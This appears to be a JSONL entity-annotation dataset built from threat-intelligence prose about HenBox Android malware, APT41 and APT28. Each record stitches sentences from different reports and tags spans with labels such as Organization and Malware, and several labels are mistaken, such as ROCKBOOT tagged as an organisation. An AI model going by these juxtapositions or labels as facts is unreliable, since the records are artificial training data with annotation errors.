{"text": "Most components are obfuscated in some way , whether it be simple XOR with a single-byte key , or through the use of ZIP or Zlib compression wrapped with RC4 encryption . Since 2017 , APT41's activities have included a series of supply chain compromises . We assess that APT28 is most likely sponsored by the Russian government .", "spans": [{"start": 117, "end": 120, "label": "System"}, {"start": 124, "end": 128, "label": "System"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 271, "end": 276, "label": "Organization"}, {"start": 309, "end": 327, "label": "Organization"}]}
{"text": "These components are responsible for a myriad of functions including handling decryption , network communications , gaining super-user privileges , monitoring system logs , loading additional Dalvik code files , tracking the device location and more . The group also targeted companies involved in producing motherboards , processors , and server solutions for enterprises . Given the available data , we assess that APT28 's work is sponsored by the Russian government .", "spans": [{"start": 256, "end": 261, "label": "Organization"}, {"start": 298, "end": 320, "label": "Organization"}, {"start": 323, "end": 333, "label": "Organization"}, {"start": 340, "end": 356, "label": "Organization"}, {"start": 417, "end": 422, "label": "Organization"}, {"start": 451, "end": 469, "label": "Organization"}]}
{"text": "The remainder of this section describes at a high-level what HenBox is capable of , and how it operates . Since 2013 , APT41 has targeted organizations involved in the research , development , and sale of computer components used for machine-learning , autonomous vehicles , medical imaging , and the consumer market . The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election .", "spans": [{"start": 119, "end": 124, "label": "Organization"}, {"start": 138, "end": 151, "label": "Organization"}, {"start": 234, "end": 250, "label": "Organization"}, {"start": 253, "end": 272, "label": "Organization"}, {"start": 275, "end": 290, "label": "Organization"}, {"start": 301, "end": 316, "label": "Organization"}, {"start": 445, "end": 453, "label": "Organization"}, {"start": 458, "end": 478, "label": "Organization"}, {"start": 531, "end": 538, "label": "Organization"}, {"start": 543, "end": 553, "label": "Organization"}, {"start": 573, "end": 580, "label": "Organization"}, {"start": 585, "end": 596, "label": "Organization"}]}
{"text": "The description is based on analysis of the sample described in Table 3 below , which was of interest given its C2 domain mefound [ . In a 2014 compromise , APT41 targeted a European conglomerate and specifically focused on systems physically located in China . The targets of TG-4127 include military , government and defense sectors .", "spans": [{"start": 115, "end": 133, "label": "Indicator"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 174, "end": 195, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}, {"start": 293, "end": 301, "label": "Organization"}, {"start": 304, "end": 314, "label": "Organization"}, {"start": 319, "end": 334, "label": "Organization"}]}
{"text": "] com overlaps with PlugX , Zupdax , and Poison Ivy malware families discussed in more detail later . In spring 2015 , APT41 targeted information related to two entities undergoing a merger announced the previous year . Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK .", "spans": [{"start": 20, "end": 25, "label": "Malware"}, {"start": 28, "end": 34, "label": "Malware"}, {"start": 41, "end": 51, "label": "Malware"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 270, "end": 289, "label": "Malware"}, {"start": 318, "end": 326, "label": "Malware"}, {"start": 335, "end": 361, "label": "Malware"}, {"start": 375, "end": 384, "label": "Malware"}]}
{"text": "SHA256 Package Name App Name a6c7351b09a733a1b3ff8a0901c5bde fdc3b566bfcedcdf5a338c3a97c9f249b com.android.henbox \u5907\u4efd ( Backup ) Table 3 HenBox variant used in description Once this variant of HenBox is installed on the victim \u2019 s device , the app can be executed in two different ways : One method for executing HenBox is for the victim to launch the malicious app ( named \u201c Backup \u201d , in Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region . While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government .", "spans": [{"start": 29, "end": 60, "label": "Indicator"}, {"start": 95, "end": 113, "label": "Indicator"}, {"start": 136, "end": 142, "label": "Malware"}, {"start": 192, "end": 198, "label": "Malware"}, {"start": 312, "end": 318, "label": "Malware"}, {"start": 402, "end": 407, "label": "Organization"}, {"start": 434, "end": 462, "label": "Organization"}, {"start": 560, "end": 567, "label": "Organization"}, {"start": 798, "end": 816, "label": "Organization"}]}
{"text": "this instance ) from the launcher view on their device , as shown in Figure 3 below . Targeted telecom companies spanned several countries , and recently identified intrusions were concentrated in countries where we had not identified any prior APT41 activity . CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": [{"start": 95, "end": 112, "label": "Organization"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 262, "end": 265, "label": "Organization"}, {"start": 413, "end": 431, "label": "Organization"}]}
{"text": "This runs code in the onCreate ( ) method of the app \u2019 s MainActivity class , which in effect is the program \u2019 s entry point . In July and August 2016 , APT41 sent spear-phishing emails to Hong Kong media organizations known for pro-democracy editorial content . This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian government .", "spans": [{"start": 153, "end": 158, "label": "Organization"}, {"start": 189, "end": 204, "label": "Organization"}, {"start": 412, "end": 417, "label": "Organization"}, {"start": 425, "end": 443, "label": "Organization"}]}
{"text": "This process is defined in the app \u2019 s AndroidManifest.xml config file , as shown in the following snippet . This was the first instance we have observed of APT41 targeting pro-democracy groups in Hong Kong . Our visibility into the operations of APT28 - a group we believe the Russian government sponsors - has given us insight into some of the government 's targets , as well as its objectives and the activities designed to further them .", "spans": [{"start": 157, "end": 162, "label": "Organization"}, {"start": 173, "end": 186, "label": "Organization"}, {"start": 247, "end": 252, "label": "Organization"}, {"start": 278, "end": 296, "label": "Organization"}, {"start": 346, "end": 356, "label": "Organization"}]}
{"text": "Doing so executes code checking if the device is manufactured by Xiaomi , or if Xiaomi \u2019 s fork of Android is running on the device . APT41 frequently leverages timely news stories as the lure content in their spear-phishing emails , although social engineering content does not always correlate with targeted users or organizations . Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests .", "spans": [{"start": 65, "end": 71, "label": "Organization"}, {"start": 80, "end": 90, "label": "Organization"}, {"start": 99, "end": 106, "label": "System"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 357, "end": 362, "label": "Organization"}]}
{"text": "Under these conditions , the app continues executing and the intent of targeting Xiaomi devices and users could be inferred , however poorly written code results in execution in more environments than perhaps intended ; further checks are made to ascertain whether the app is running on an emulator , perhaps to evade researcher analysis environments . In 2015 , APT41 targeted a Japanese media organization with a lure document (Figure 3) titled \u4e2d\u6771\u547c\u5438\u5668\u75c7\u5019 \u7fa4(MERS)\u306e\u4e88\u9632 , \u201d which translates to Prevention of Middle East Respiratory Syndrome (MERS) . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 81, "end": 87, "label": "Organization"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 380, "end": 407, "label": "Organization"}, {"start": 683, "end": 694, "label": "Organization"}, {"start": 697, "end": 707, "label": "Organization"}, {"start": 710, "end": 726, "label": "Organization"}, {"start": 729, "end": 743, "label": "Organization"}, {"start": 750, "end": 760, "label": "Organization"}, {"start": 765, "end": 772, "label": "Organization"}, {"start": 796, "end": 814, "label": "Organization"}]}
{"text": "Assuming these checks pass , one of the main ELF libraries is loaded that orchestrates other components and provides functionality to the app \u2019 s Dalvik code through the Java Native Interface ( JNI ) . APT41 activity aimed at medical device companies and pharmaceuticals is demonstrative of the group's capacity to collect sensitive and highly valuable intellectual property (IP) , although we have not observed evidence of IP theft since late 2015 . APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian government .", "spans": [{"start": 202, "end": 207, "label": "Organization"}, {"start": 226, "end": 250, "label": "Organization"}, {"start": 588, "end": 599, "label": "Organization"}, {"start": 604, "end": 614, "label": "Organization"}, {"start": 617, "end": 633, "label": "Organization"}, {"start": 636, "end": 650, "label": "Organization"}, {"start": 657, "end": 667, "label": "Organization"}, {"start": 672, "end": 679, "label": "Organization"}, {"start": 703, "end": 721, "label": "Organization"}]}
{"text": "HenBox checks whether this execution is its first by using Android \u2019 s shared preferences feature to persist XML key-value pair data . Unlike other observed Chinese espionage operators , APT41 conducts explicit financially motivated activity , which has included the use of tools that are otherwise exclusively used in campaigns supporting state interests . Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 59, "end": 66, "label": "System"}, {"start": 187, "end": 192, "label": "Organization"}, {"start": 211, "end": 222, "label": "Organization"}, {"start": 430, "end": 435, "label": "Organization"}]}
{"text": "If it is the first execution , and if the app \u2019 s path does not contain \u201c /system/app \u201d ( i.e . Although APT41 initially targeted the parent company , 30 percent of the victimized hosts were related to a subsidiary specialized in manufacturing medical devices . After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests .", "spans": [{"start": 74, "end": 85, "label": "Indicator"}, {"start": 105, "end": 110, "label": "Organization"}, {"start": 134, "end": 148, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}]}
{"text": "HenBox is not running as a system app ) , another ELF library is loaded to aid with executing super-user commands . In 2018 , we observed APT41 target a third healthcare company , although their goals during this compromise were unclear . After compromising a political organization , APT28 will steal internal data .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 138, "end": 143, "label": "Organization"}, {"start": 153, "end": 169, "label": "Organization"}, {"start": 260, "end": 282, "label": "Organization"}, {"start": 285, "end": 290, "label": "Organization"}]}
{"text": "The second method uses intents , broadcasts , and receivers to execute HenBox code . In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye 's long held public assessment that the Russian government sponsors APT28 .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 361, "end": 392, "label": "Organization"}, {"start": 395, "end": 398, "label": "Organization"}, {"start": 439, "end": 442, "label": "Organization"}, {"start": 489, "end": 496, "label": "Organization"}, {"start": 537, "end": 555, "label": "Organization"}, {"start": 565, "end": 570, "label": "Organization"}]}
{"text": "Providing the app has registered an intent to process particular events from the system , and one of said events occurs , HenBox is effectively brought to life through external stimulus from another app on the system broadcasting a request , or the system itself broadcasting a particular event has occurred . This provides another connection between the targeting of the cryptocurrency organizations and video game targeting . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian government 's strategic intelligence requirements .", "spans": [{"start": 372, "end": 400, "label": "Organization"}, {"start": 405, "end": 425, "label": "Organization"}, {"start": 446, "end": 453, "label": "Organization"}, {"start": 463, "end": 468, "label": "Organization"}, {"start": 542, "end": 547, "label": "Organization"}, {"start": 581, "end": 599, "label": "Organization"}]}
{"text": "These intents are typically defined statically in the app \u2019 s AndroidManifest.xml config file ; some HenBox variants register further intents from their code at run-time . In October 2018 , the group compiled an instance of XMRig , a Monero cryptocurrency mining tool , demonstrating a continued interest in cryptocurrency . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations' , and characterized APT28 's activity as aligning with the Russian government 's strategic intelligence requirements .", "spans": [{"start": 101, "end": 107, "label": "Malware"}, {"start": 194, "end": 199, "label": "Organization"}, {"start": 224, "end": 229, "label": "System"}, {"start": 343, "end": 350, "label": "Organization"}, {"start": 360, "end": 365, "label": "Organization"}, {"start": 440, "end": 445, "label": "Organization"}, {"start": 479, "end": 497, "label": "Organization"}]}
{"text": "Once a matching intent is triggered , the respective Receiver code will be executed , leading to other HenBox behaviors being launched , which are described later . APT41 campaigns focused on the video game sector have largely affected studios and distributors in East and Southeast Asia , although global companies based in the United States have also been targeted . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": [{"start": 165, "end": 170, "label": "Organization"}, {"start": 196, "end": 213, "label": "Organization"}, {"start": 299, "end": 315, "label": "Organization"}, {"start": 369, "end": 374, "label": "Organization"}, {"start": 391, "end": 398, "label": "Organization"}, {"start": 403, "end": 424, "label": "Organization"}, {"start": 444, "end": 450, "label": "System"}]}
{"text": "Table 4 below lists the intents that are statically registered in this HenBox variant \u2019 s AndroidManifest.xml config file , together with a description of what that intent does , and when it would be used . APT41 continuously returns to targeting the video game sector and seems to have matured its campaigns through lessons learned in operations against the industry . Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": [{"start": 71, "end": 77, "label": "Malware"}, {"start": 207, "end": 212, "label": "Organization"}, {"start": 251, "end": 268, "label": "Organization"}, {"start": 391, "end": 396, "label": "Organization"}, {"start": 414, "end": 418, "label": "Organization"}]}
{"text": "Depending on the intent triggered , one of two Receivers would be called , in this instance they are called Boot or Time but the name is somewhat immaterial . We believe these operations include broadly malicious activity that can enable further operations , such as targeting game source code and compromising digital certificates , while other activities are explicitly financially motivated , such as abusing in-game currency mechanics . Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian government .", "spans": [{"start": 277, "end": 293, "label": "System"}, {"start": 311, "end": 331, "label": "System"}, {"start": 502, "end": 507, "label": "Organization"}, {"start": 528, "end": 546, "label": "Organization"}]}
{"text": "Receiver Intent Name Description BootReceiver android.intent.action.BOOT_COMPLETED System notification that the device has finished booting . In October 2012 , APT41 used captured credentials to compromise a jump server and access a production environment where they deployed a Linux version of PHOTO . In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor .", "spans": [{"start": 46, "end": 82, "label": "Indicator"}, {"start": 160, "end": 165, "label": "Organization"}, {"start": 338, "end": 343, "label": "Organization"}]}
{"text": "android.intent.action.restart A legacy intent used to indicate a system restart . Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators . For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations .", "spans": [{"start": 0, "end": 29, "label": "Indicator"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 210, "end": 237, "label": "Organization"}, {"start": 284, "end": 298, "label": "Organization"}, {"start": 355, "end": 360, "label": "Organization"}]}
{"text": "android.intent.action.SIM_STATE_CHANGED System notification that the SIM card has changed or been removed . APT41 has been observed inserting malicious code into legitimate video game files to distribute malware . The espionage group , which according to the U.S. Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": [{"start": 0, "end": 39, "label": "Indicator"}, {"start": 108, "end": 113, "label": "Organization"}, {"start": 264, "end": 295, "label": "Organization"}, {"start": 298, "end": 301, "label": "Organization"}, {"start": 346, "end": 349, "label": "Organization"}, {"start": 369, "end": 387, "label": "Organization"}, {"start": 493, "end": 501, "label": "Organization"}, {"start": 506, "end": 516, "label": "Organization"}]}
{"text": "android.intent.action.PACKAGE_INSTALL System notification that the download and eventual installation of an app package is happening ( this is deprecated ) android.intent.action.PACKAGE_ADDED System notification that a new app package has been installed on the device , including the name of said package . In 2018 , the group inserted CRACKSHOT malware into game files that were signed with legitimate codesigning certificates , most likely indicating access to the production environment , which facilitated a supply chain compromise . The APT28 , which is linked to the Russian government , returned to low-key intelligence-gathering operations during 2017 and into 2018 , targeting a range of military and government targets in Europe and South America .", "spans": [{"start": 0, "end": 37, "label": "Indicator"}, {"start": 156, "end": 191, "label": "Indicator"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 542, "end": 547, "label": "Organization"}, {"start": 573, "end": 591, "label": "Organization"}, {"start": 697, "end": 705, "label": "Organization"}, {"start": 710, "end": 720, "label": "Organization"}]}
{"text": "com.xiaomi.smarthome.receive_alarm Received notifications from Xiaomi \u2019 s smart home IoT devices . We have also observed APT41 limitedly deploy rootkits on Linux systems and Master Boot Record (MBR) bootkits , such as ROCKBOOT , on Windows systems to hide their malware and maintain persistence on victim systems . Another attack group , Earworm ( aka Zebrocy ) , has been active since at least May 2016 and is involved in what appears to be intelligence gathering operations against military targets in Europe , Central Asia , and Eastern Asia .", "spans": [{"start": 0, "end": 34, "label": "Indicator"}, {"start": 63, "end": 69, "label": "Organization"}, {"start": 121, "end": 126, "label": "Organization"}, {"start": 218, "end": 226, "label": "System"}, {"start": 338, "end": 345, "label": "Organization"}, {"start": 352, "end": 359, "label": "Organization"}]}
{"text": "TimeReceiver android.intent.action.ACTION_TIME_CHANGED System notification that the time was set . Selective deployment of ROCKBOOT suggests that APT41 reserves more advanced TTPs and malware only for high-value targets . Several sources consider APT28 a group of CyberMercs based in Russia .", "spans": [{"start": 13, "end": 54, "label": "Indicator"}, {"start": 123, "end": 131, "label": "Organization"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 247, "end": 252, "label": "Organization"}]}
{"text": "android.intent.action.CONNECTIVITY_CHANGE System notification that a change in network connectivity has occurred , either lost or established . APT41 has blatantly engaged in financially motivated activity targeting the video game industry , including manipulating virtual currencies . The primary targets of APT28 are potential victims in several countries such as Ukraine , Spain , Russia , Romania , the United States and Canada .", "spans": [{"start": 0, "end": 41, "label": "Indicator"}, {"start": 144, "end": 149, "label": "Organization"}, {"start": 220, "end": 239, "label": "Organization"}, {"start": 309, "end": 314, "label": "Organization"}]}
{"text": "Since Android version 7 ( Nougat ) this information is gathered using other means , perhaps inferring the devices used by potential victim run older versions of Android . In a highly unusual case , APT41 attempted to extort a game company by deploying the Encryptor RaaS ransomware . We have reasons to believe that the operators of the APT28 network are either Russian citizens or citizens of a neighboring country that speak Russian .", "spans": [{"start": 6, "end": 13, "label": "System"}, {"start": 26, "end": 32, "label": "System"}, {"start": 161, "end": 168, "label": "System"}, {"start": 198, "end": 203, "label": "Organization"}, {"start": 320, "end": 329, "label": "Organization"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 370, "end": 378, "label": "Organization"}, {"start": 382, "end": 390, "label": "Organization"}]}
{"text": "Table 4 HenBox variant 's Intents and Receivers Most of the intents registered in the AndroidManifest.xml file , or loaded during run-time , are commonly found in malicious Android apps . APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware . Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin .", "spans": [{"start": 8, "end": 14, "label": "Malware"}, {"start": 173, "end": 180, "label": "System"}, {"start": 188, "end": 193, "label": "Organization"}, {"start": 341, "end": 348, "label": "Organization"}]}
{"text": "What \u2019 s more interesting , and much less common , is the inclusion of the com.xiaomi.smarthome.receive_alarm intent filter . We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . Finally , the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlight APT28 's ability and interest in exploiting geopolitical events for their operations .", "spans": [{"start": 75, "end": 109, "label": "Indicator"}, {"start": 142, "end": 147, "label": "Organization"}, {"start": 413, "end": 421, "label": "Organization"}, {"start": 481, "end": 486, "label": "Organization"}, {"start": 525, "end": 537, "label": "Organization"}]}
{"text": "Xiaomi , a privately owned Chinese electronics and software company , is the 5th largest smart phone manufacturer in the world and also manufactures IoT devices for the home . APT41 has also used credentials compromised in previous operations . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM , JHUHUGIT , AZZY and a few others .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 176, "end": 181, "label": "Organization"}, {"start": 259, "end": 271, "label": "Organization"}, {"start": 342, "end": 351, "label": "Malware"}, {"start": 354, "end": 358, "label": "Malware"}, {"start": 361, "end": 369, "label": "Malware"}, {"start": 372, "end": 376, "label": "Malware"}]}
{"text": "Most devices can be controlled by Xiaomi \u2019 s \u201c MiHome \u201d Android app , which is available on Google Play with between 1,000,000 and 5,000,000 downloads . In 2014 , APT41 compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service . In 2013 , the Sofacy group expanded their arsenal and added more backdoors and tools , including CORESHELL , SPLM ( aka Xagent , aka CHOPSTICK ) , JHUHUGIT ( which is built with code from the Carberp sources ) , AZZY ( aka ADVSTORESHELL , NETUI , EVILTOSS , and spans across 4-5 generations ) and a few others .", "spans": [{"start": 34, "end": 40, "label": "Organization"}, {"start": 47, "end": 53, "label": "System"}, {"start": 56, "end": 63, "label": "System"}, {"start": 92, "end": 103, "label": "System"}, {"start": 163, "end": 168, "label": "Organization"}, {"start": 254, "end": 270, "label": "Organization"}, {"start": 288, "end": 295, "label": "Organization"}, {"start": 296, "end": 303, "label": "Organization"}, {"start": 320, "end": 332, "label": "Organization"}, {"start": 403, "end": 412, "label": "Malware"}, {"start": 415, "end": 419, "label": "Malware"}, {"start": 426, "end": 432, "label": "Malware"}, {"start": 439, "end": 448, "label": "Malware"}, {"start": 453, "end": 461, "label": "Malware"}, {"start": 498, "end": 505, "label": "Malware"}, {"start": 518, "end": 522, "label": "Malware"}, {"start": 553, "end": 561, "label": "Malware"}]}
{"text": "Given the nature of connected devices in smart homes , it \u2019 s highly likely many of these devices , and indeed the controller app itself , communicate with one another sending status notifications , alerts and so on . Although we do not have first-hand evidence of APT41's compromise of TeamViewer , we have observed APT41 use compromised TeamViewer credentials as an entry point at multiple organizations . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 287, "end": 297, "label": "System"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 412, "end": 424, "label": "Organization"}, {"start": 468, "end": 473, "label": "System"}, {"start": 474, "end": 482, "label": "Vulnerability"}, {"start": 500, "end": 507, "label": "Malware"}, {"start": 514, "end": 534, "label": "Malware"}]}
{"text": "Such notifications would be received by the MiHome app or any other , such as HenBox , so long as they register their intent to do so . Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 44, "end": 50, "label": "System"}, {"start": 78, "end": 84, "label": "Malware"}, {"start": 189, "end": 194, "label": "Organization"}, {"start": 332, "end": 337, "label": "Organization"}, {"start": 340, "end": 345, "label": "Organization"}, {"start": 389, "end": 394, "label": "System"}, {"start": 395, "end": 403, "label": "Vulnerability"}, {"start": 421, "end": 428, "label": "Malware"}, {"start": 435, "end": 455, "label": "Malware"}]}
{"text": "This could essentially allow for external devices to act as a trigger to execute the malicious HenBox code , or perhaps afford additional data HenBox can collect and exfiltrate . As demonstrated in operations targeting the video game industry , APT41 leverages a variety of TTPs to access production environments where they can inject malicious code into legitimate files . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": [{"start": 95, "end": 101, "label": "Malware"}, {"start": 143, "end": 149, "label": "Malware"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 263, "end": 278, "label": "System"}, {"start": 427, "end": 432, "label": "System"}, {"start": 433, "end": 441, "label": "Vulnerability"}, {"start": 459, "end": 466, "label": "Malware"}, {"start": 473, "end": 493, "label": "Malware"}]}
{"text": "Either method to load HenBox ultimately results in an instance of a service being launched . In March 2017 , suspected Chinese espionage operators targeted CCleaner , a utility that assists in the removal of unwanted files from a computer . Their evolving and modified SPLM , CHOPSTICK , XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 119, "end": 146, "label": "Organization"}, {"start": 269, "end": 273, "label": "Malware"}, {"start": 276, "end": 285, "label": "Malware"}, {"start": 288, "end": 294, "label": "Malware"}]}
{"text": "This service hides the app from plain sight and loads another ELF library to gather environmental information about the device , such as running processes and apps , and details about device hardware , primarily through parsing system logs and querying running processes . In July 2017 , APT41 injected malicious code into a software update package maintained by Netsarang and signed it with a legitimate Netsarang certificate in an operation referred to as ShadowPad by Kaspersky . FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 .", "spans": [{"start": 288, "end": 293, "label": "Organization"}, {"start": 471, "end": 480, "label": "Organization"}, {"start": 483, "end": 490, "label": "Organization"}, {"start": 545, "end": 563, "label": "Organization"}, {"start": 589, "end": 600, "label": "Organization"}]}
{"text": "The service continues by loading an ELF , created by Baidu , which is capable of tracking the device location before setting up a monitor to harvest phone numbers associated with outgoing calls for those numbers with a country code \u201c +86 \u201d prefix , which relates to the People \u2019 s Republic of China . Both APT41 and the actors in the CCleaner incident used TeamViewer during initial compromise . APT28 is using novel techniques involving the EternalBlue exploits and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": [{"start": 53, "end": 58, "label": "Organization"}, {"start": 306, "end": 311, "label": "Organization"}, {"start": 357, "end": 367, "label": "System"}, {"start": 396, "end": 401, "label": "Organization"}, {"start": 442, "end": 453, "label": "Vulnerability"}, {"start": 454, "end": 462, "label": "Vulnerability"}, {"start": 471, "end": 487, "label": "Malware"}, {"start": 488, "end": 497, "label": "Malware"}]}
{"text": "Further assets are decrypted and deployed , including another Dalvik DEX code file , which has various capabilities including registering itself as the incoming SMS handler for the device to intercept SMS messages , loading another ELF library that includes a version of BusyBox - a package containing various stripped-down Unix tools useful for administering such systems \u2013 and , interestingly , is capable of turning off the sound played when the device \u2019 s cameras take pictures . Supply chain compromises are most likely an extension of APT41's tactics used in gaining access to gaming development environments and to other gaming organizations via third-party service providers . Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder .", "spans": [{"start": 271, "end": 278, "label": "System"}, {"start": 541, "end": 548, "label": "Organization"}, {"start": 771, "end": 776, "label": "Organization"}, {"start": 786, "end": 795, "label": "Malware"}]}
{"text": "The Android permissions requested by HenBox , as defined in the apps \u2019 AndroidManifest.xml files , range from accessing location and network settings to messages , call , and contact data . Beginning in July 2018 , APT41 appeared to have directly targeted several East and Southeast Asia-based video game developers and distributors to inject legitimate executables with the CRACKSHOT backdoor . Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 37, "end": 43, "label": "Malware"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 294, "end": 315, "label": "Organization"}, {"start": 414, "end": 428, "label": "Malware"}, {"start": 449, "end": 461, "label": "Organization"}, {"start": 475, "end": 482, "label": "Malware"}]}
{"text": "HenBox can also access sensors such as the device camera ( s ) and the microphone . The lure used to target the cryptocurrency exchange (displayed in Figure 5 and translated in Figure 6) referenced an online gaming platform , tying the cryptocurrency targeting to APT41's focus on video game-related targeting . As alluded to in our previous blog regarding the Cannon tool , the Sofacy group ( AKA Fancy Bear , APT28 , STRONTIUM , Pawn Storm , Sednit ) has persistently attacked various government and private organizations around the world from mid-October 2018 through mid-November 2018 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 264, "end": 271, "label": "Organization"}, {"start": 281, "end": 299, "label": "Organization"}, {"start": 361, "end": 372, "label": "Malware"}, {"start": 379, "end": 391, "label": "Organization"}, {"start": 398, "end": 408, "label": "Organization"}, {"start": 411, "end": 416, "label": "Organization"}, {"start": 419, "end": 428, "label": "Organization"}, {"start": 431, "end": 441, "label": "Organization"}, {"start": 444, "end": 450, "label": "Organization"}, {"start": 487, "end": 497, "label": "Organization"}]}
{"text": "Beyond the Android app itself , other components such as the aforementioned ELF libraries have additional data-stealing capabilities . FireEye malware analysis identified source code overlaps between malware used by APT41 in May 2016 targeting of a U.S.-based game development studio and the malware observed in supply chain compromises in 2017 and 2018 . Russian citizens\u2014journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 216, "end": 221, "label": "Organization"}, {"start": 260, "end": 276, "label": "Organization"}, {"start": 364, "end": 384, "label": "Organization"}, {"start": 387, "end": 406, "label": "Organization"}, {"start": 409, "end": 420, "label": "Organization"}, {"start": 423, "end": 450, "label": "Organization"}, {"start": 457, "end": 464, "label": "Organization"}, {"start": 486, "end": 496, "label": "Organization"}]}
{"text": "One ELF library , libloc4d.so , handles amongst other things the loading of the app-decoded ELF library file \u201c sux \u201d , as well as handling connectivity to the C2 . In May 2016 , APT41 deployed a POISONPLUG sample at a U.S.-based game development studio . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 .", "spans": [{"start": 18, "end": 29, "label": "Indicator"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 259, "end": 267, "label": "Malware"}, {"start": 365, "end": 369, "label": "System"}, {"start": 370, "end": 378, "label": "Vulnerability"}, {"start": 381, "end": 394, "label": "Vulnerability"}]}
{"text": "The sux library appears to be a customized super user ( su ) tool that includes code from the com.koushikdutta.superuser app and carries the equivalent of a super user ( su ) binary in order to run privileged commands on the system . Alternatively , it is also possible that APT41 injected malicious code into the package prior to compilation , circumventing the need to steal the code-signing certificate and compile it on their own . While the JHUHUGIT ( and more recently , \" JKEYSKW \" ) implant used in most of the Sofacy attacks , high profile victims are being targeted with another first level implant , representing the latest evolution of their AZZY Trojan .", "spans": [{"start": 94, "end": 120, "label": "Indicator"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 446, "end": 454, "label": "Malware"}, {"start": 479, "end": 486, "label": "Malware"}, {"start": 654, "end": 665, "label": "Malware"}]}
